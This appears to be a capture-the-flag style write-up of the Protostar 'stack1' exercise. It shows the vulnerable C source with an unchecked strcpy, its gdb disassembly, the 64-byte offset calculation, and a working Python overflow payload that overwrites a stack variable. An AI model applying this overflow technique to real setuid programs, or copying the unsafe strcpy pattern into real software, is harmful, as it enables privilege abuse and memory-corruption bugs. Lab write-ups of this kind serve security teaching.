protostar - stack 1
Lets check the file type of our binary using file
command,
$ file stack1
stack1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
Lets try running it,
$ ./stack1
stack1: please specify an argument
$ ./stack1 monish
Try again, you got 0x00000000
It seems like we have to overwrite the buffer
with some value
Lets view the source code for proper understanding,
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
We need to overwrite the modified
variable with 0x61626364
Lets use our debugger to analyse it,
Disassembling main()
,
(gdb) disas main
Dump of assembler code for function main:
0x08048464 <main+0>: push ebp
0x08048465 <main+1>: mov ebp,esp
0x08048467 <main+3>: and esp,0xfffffff0
0x0804846a <main+6>: sub esp,0x60
0x0804846d <main+9>: cmp DWORD PTR [ebp+0x8],0x1
0x08048471 <main+13>: jne 0x8048487 <main+35>
0x08048473 <main+15>: mov DWORD PTR [esp+0x4],0x80485a0
0x0804847b <main+23>: mov DWORD PTR [esp],0x1
0x08048482 <main+30>: call 0x8048388 <errx@plt>
0x08048487 <main+35>: mov DWORD PTR [esp+0x5c],0x0
0x0804848f <main+43>: mov eax,DWORD PTR [ebp+0xc]
0x08048492 <main+46>: add eax,0x4
0x08048495 <main+49>: mov eax,DWORD PTR [eax]
0x08048497 <main+51>: mov DWORD PTR [esp+0x4],eax
0x0804849b <main+55>: lea eax,[esp+0x1c]
0x0804849f <main+59>: mov DWORD PTR [esp],eax
0x080484a2 <main+62>: call 0x8048368 <strcpy@plt>
0x080484a7 <main+67>: mov eax,DWORD PTR [esp+0x5c]
0x080484ab <main+71>: cmp eax,0x61626364
0x080484b0 <main+76>: jne 0x80484c0 <main+92>
0x080484b2 <main+78>: mov DWORD PTR [esp],0x80485bc
0x080484b9 <main+85>: call 0x8048398 <puts@plt>
0x080484be <main+90>: jmp 0x80484d5 <main+113>
0x080484c0 <main+92>: mov edx,DWORD PTR [esp+0x5c]
0x080484c4 <main+96>: mov eax,0x80485f3
0x080484c9 <main+101>: mov DWORD PTR [esp+0x4],edx
0x080484cd <main+105>: mov DWORD PTR [esp],eax
0x080484d0 <main+108>: call 0x8048378 <printf@plt>
0x080484d5 <main+113>: leave
0x080484d6 <main+114>: ret
Here modified
is set to 0
by,
0x08048487 <main+35>: mov DWORD PTR [esp+0x5c],0x0
Here buffer
space is allocated by,
0x0804849b <main+55>: lea eax,[esp+0x1c]
Inorder to overwrite modified
we need to find the space between them,
>>> print(0x5c-0x1c)
64
Passing 64 bytes of junk,
$ ./stack1 $(python -c "print('A'*64)")
Try again, you got 0x00000000
Lets try to overwrite,
$ ./stack1 $(python -c "print('A'*64+'BBBB')")
Try again, you got 0x42424242
We successfully ovewrote our junk BBBB
Lets exploit it,
$ ./stack1 $(python -c "print('A'*64+'\x64\x63\x62\x61')")
you have correctly got the variable to the right value
Done! we have completed “stack1”